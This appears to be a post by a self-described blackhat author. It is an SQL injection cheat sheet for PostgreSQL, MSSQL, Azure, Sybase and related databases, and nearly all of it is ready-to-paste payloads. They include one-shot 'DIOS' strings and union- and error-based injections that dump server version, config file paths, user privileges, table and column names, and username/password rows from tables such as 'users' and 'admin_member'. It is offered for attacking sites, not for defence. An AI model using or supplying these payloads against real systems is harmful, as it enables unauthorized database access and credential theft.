SQL Injection – DB SQL ( Interbase / Firebird | Micro Azure | Oracle | PostgreSQL | Sybase | Mssql )

Comments off | SQL By · 17/11/2022



MYSQL | SYBASE | POSTGRESQL | IMB DB2 | ORACLE | SQLITE | INFORMIX | FIREBIRD | MICROSOFT ACCESS | MICROSOFT SERVER [MSSQL] | PHPMYWIND [MYSQL] |

Re-Upload : 15 Juli 2022

@Arjuna Dewangga
@Javanese BlackHat ID 14

==================
Credit : Dewangga

– MICROSOFT AZURE INJECTION ( UNION AND ERROR BASED )
– ORACLE INJECTION ( ERROR BASED )
– POSTGRESQL INJECTION ( ERROR BASED )
– SYBASE MSSQL INJECTION ( ERROR BASED )
– FIREBIRD INJECTION ( ERROR BASED )

=================

substr(version(), 12,6) / etc

# DIOS POSTGRE

%24%24DEWANGGA%24%24||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24VERSION%3e%3e%3e%24%24||version()||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24DATABASE%3e%3e%3e %24%24||current_database()||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24DB FILES %3e%3e%3e %24%24||CHR(60)||CHR(98)||CHR(114)||CHR(62)||%24%24 – HBA%3e%3e%24%24||current_setting(%24%24hba_file%24%24)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||%24%24 – DIRECTORY %3e%3e%3e %24%24||current_setting(%24%24data_directory%24%24)||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24HOSTNAME%3e%3e%3e %24%24||CHR(60)||CHR(98)||CHR(114)||CHR(62)||%24%24 – PORT %3e%3e%3e %24%24||inet_server_port()||CHR(60)||CHR(98)||CHR(114)||CHR(62)||%24%24 – ADDR %3e%3e%3e %24%24||inet_server_addr()||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24USER %3e%3e%3e %24%24||user||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24PRIVILEGES %3e%3e%3e %24%24||(SELECT usename||%24%24 %3e%3e %24%24||usecreatedb||%24%24 %3e%3e %24%24||usesuper FROM pg_user)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(SELECT ARRAY_TO_STRING(array(SELECT(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name)::TEXT FROM information_schema.columns WHERE table_schema=%24%24public%24%24),CHR(60)||CHR(98)||CHR(114)||CHR(62)))

And 1=cast(‘Dew’||’%3cbr%3e’||version()||’%3cbr%3e’||(SELECT+ARRAY_TO_STRING(ARRAY_AGG(concat(table_name,’:’,column_name)::TEXT),’%3cli%3e’)FROM+information_schema.columns+WHERE+table_schema+NOT+in(‘information_schema’,’pg_catalog’)) as integer)

–+- / and 1=1

Cast(DIOS.. as int)/integer
Cast(DIOS.. as numeric)

# DIOS ( MICROSOFT SERVER ( MSSQL ) | AZURE | SYBASE )

And 1=0 UNION SELECT 1,concat(Dios),3–

and 1=cast(‘DEWANGGA’%2b’ || ‘%2bdb_name()%2b’||’%2b@@servername%2b’||’%2buser%2b’||’%2b@@version%2b’||’%2b(select+%2b’ ‘%2btable_name%2b’::’%2bcolumn_name as t+from+information_schema.columns FOR XML PATH(”)) as nvarchar (4000))

CAST(DIOS..AS VARCHAR(4000))
CAST(DIOS..AS CHAR(4000))
(8000) (10000)

version
or 1=convert(numeric,(select @@version))#
current_db
or 1=convert(numeric,(select db_name()))#
Tables of current_db
or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55))#
Columns of selected
table(admin_member)
or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653)))#
U/p
or 1=convert(numeric,(select min(name||0x3a||id||0x3a||passwd) from admin_member))#

Table
CoNCat(‘%3cli%3e’,name,’%3cli%3e’,id)
From DB..sysobjects where type=0x55 and id not in(1)

Column
CoNCat(‘%3cli%3e’,name,’%3cli%3e’,colid)
From DB..syscolumns where id=74653 and colid not in(1)

ERROR BASED

Db_name @@version user @@servername
+and+1=convert(int,@@version)–

TABLE
+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))–

+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
not+in+(‘products’)))–

not in(‘products’,’users’)))–

jika error pakai CHAR(78)%2bCHAR(77)

COLUMN
+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name=’users’))–

and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name=’users’+
and+column_name+not+in+(‘username’)))–

not in(‘username’,’Password’)))–

U/P
and+1=convert(int,(select+top+1+username+from+users))–

DB
(select%2b’:’%2bname as t+from+master..sysdatabases FOR XML PATH(”))

Table
(select%2b’:’%2bname as t+from+database web..sysobjects FOR XML PATH(”))

(select%2b’:’%2bname as t+from+database web..sysobjects WHERE xtype = ‘U’ FOR XML PATH(”))

Column
(select%2b’:’%2bname as t+from+sycolumns FOR XML PATH(”))

(select%2b’:’%2bname as t FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘tbl_name’ FOR XML PATH(”))

(select sqltext.text from sys.dm_exec_requests req cross apply sys.dm_exec_sql_text(req.sql_handle) AS sqltext)

#SQLI #Sqlinjection #sqlihardbypass
THANKS

53GB.COM GPTSTORE CPU Yougpt Gptsio Gpt-store-Nav